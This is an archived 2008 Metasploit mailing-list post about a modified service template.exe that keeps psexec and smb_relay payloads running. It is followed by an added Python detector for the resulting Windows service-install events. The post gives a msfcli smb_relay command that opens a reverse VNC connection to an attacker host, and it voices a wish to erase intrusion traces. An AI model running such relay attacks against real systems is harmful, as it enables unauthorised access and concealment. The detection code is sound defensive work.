Metasploit mailing list archives

NTLM relay implemented in Metasploit 3?


From: sigtrap at sigtrap.org (sigtrap)
Date: Thu, 07 Feb 2008 10:24:11 +0100

Hi,
I have posted a service template.exe to this list before.
I'll post it again because it works as a charm when you look 
for "Wireless Zero Configuration" hosts.
The password is 31 characters. Not 8 :-)
Here is my old post:

----------------------------
I now have a new "service template.exe". I managed to steal 10 minutes 
from my friend Magnus Br?ding, in which he threw together a service 
executable template PoC (yes, we're sorry it's bloated :-)) It's 
attached with the password:
"password" (without the quotes)

Got it? ;-)

If you backup the original template.exe and use this instead, the 
exploits psexec and smb_relay will work as intended (other exploits, 
that don't expect a service exe, probably won't work).

Eg:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7
PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts.
The payload is executed in a new thread.
The service controller *doesn't* kill the process after 30 seconds 
anymore, as it does with the normal template.exe.
When you terminate the vncclient the payload terminates the process 
through the "EXITFUNC=process".
The Windows service MMC snap-in will now report the created service 
as "stopped".

If we could now just make the handler (i.e. the one that starts the 
VNC client on the attacking computer) report back to the exploit when 
the payload on the victim computer has ended (and thus its process has 
also terminated in this case), it would be easy to remove the service 
and executable on the victim computer, thereby leaving no bigger trace 
behind of the intrusion. I don't know how to do this, but it would be 
really great if someone did.
------------------

Regards
//Sigtrap


-----Original Message-----
From: H D Moore <hdm at metasploit.com>

The three big missing features:

3) A services wrapper around the EXE that prevents it from being killed
after ~30 seconds. 

-HD
-------------- next part --------------
A non-text attachment was scrubbed...
Name: template.exe.bin.pgp
Type: application/octet-stream
Size: 224107 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080207/c3ddea9c/attachment.obj>
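The service lifecycle described in the post (service installed from an admin share, started, then reported as "stopped" while the executable is left behind) is exactly what a defender can pick up in the Windows System log. The following is an added example, not code from the post or from Metasploit: it correlates Service Control Manager 7045 (service installed) and 7036 (state change) records over constructed sample lines. The log line format and the 8-letter random-name heuristic are assumptions of this example.

```python
# Added example, not part of the original post: flag psexec/smb_relay-style
# service installs in Windows System-log records. The sample lines are
# constructed; event IDs 7045 and 7036 are the real Service Control Manager IDs.
import re
from datetime import datetime, timedelta

# Constructed sample records: "<ISO timestamp> <event id> <message>"
SAMPLE_LOG = """\
2008-02-07T10:20:01 7045 A service was installed in the system. Service Name: XKqTvWmB Service File Name: \\\\127.0.0.1\\ADMIN$\\XKqTvWmB.exe Service Type: user mode service Service Start Type: demand start
2008-02-07T10:20:02 7036 The XKqTvWmB service entered the running state.
2008-02-07T10:20:09 7036 The XKqTvWmB service entered the stopped state.
2008-02-07T10:25:00 7045 A service was installed in the system. Service Name: Backup Agent Service File Name: C:\\Program Files\\Vendor\\agent.exe Service Type: user mode service Service Start Type: auto start
2008-02-07T10:25:01 7036 The Backup Agent service entered the running state.
"""

LINE_RE = re.compile(r"^(\S+) (\d+) (.*)$")
INSTALL_RE = re.compile(r"Service Name: (.+?) Service File Name: (.+?) Service Type:")
STATE_RE = re.compile(r"^The (.+?) service entered the (\w+) state\.$")
# Binary dropped through the ADMIN$ share, the path psexec-style tools use
ADMIN_SHARE_RE = re.compile(r"\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)
RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{8}$")  # heuristic: 8 random letters

def parse(log):
    """Turn the constructed text records into (timestamp, event id, message)."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)), int(m.group(2)), m.group(3)))
    return events

def find_suspicious_installs(log, window=timedelta(minutes=5)):
    """Return (service name, binary path, reasons) for 7045 installs that look psexec-like."""
    events = parse(log)
    hits = []
    for ts, eid, msg in events:
        m = INSTALL_RE.search(msg) if eid == 7045 else None
        if not m:
            continue
        name, path = m.group(1), m.group(2)
        reasons = []
        if ADMIN_SHARE_RE.search(path):
            reasons.append("binary in ADMIN$ share")
        if RANDOM_NAME_RE.match(name):
            reasons.append("random-looking service name")
        # Short-lived service: a 'stopped' transition for the same name soon after install
        for ts2, eid2, msg2 in events:
            s = STATE_RE.match(msg2) if eid2 == 7036 else None
            if s and s.group(1) == name and s.group(2) == "stopped" and ts <= ts2 <= ts + window:
                reasons.append("stopped within %ds of install" % (ts2 - ts).seconds)
                break
        if reasons:
            hits.append((name, path, reasons))
    return hits
```

Each reason is a weak signal on its own; the combination (share-dropped binary, random name, stopped seconds after install) is what distinguishes the pattern from a legitimate installer.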
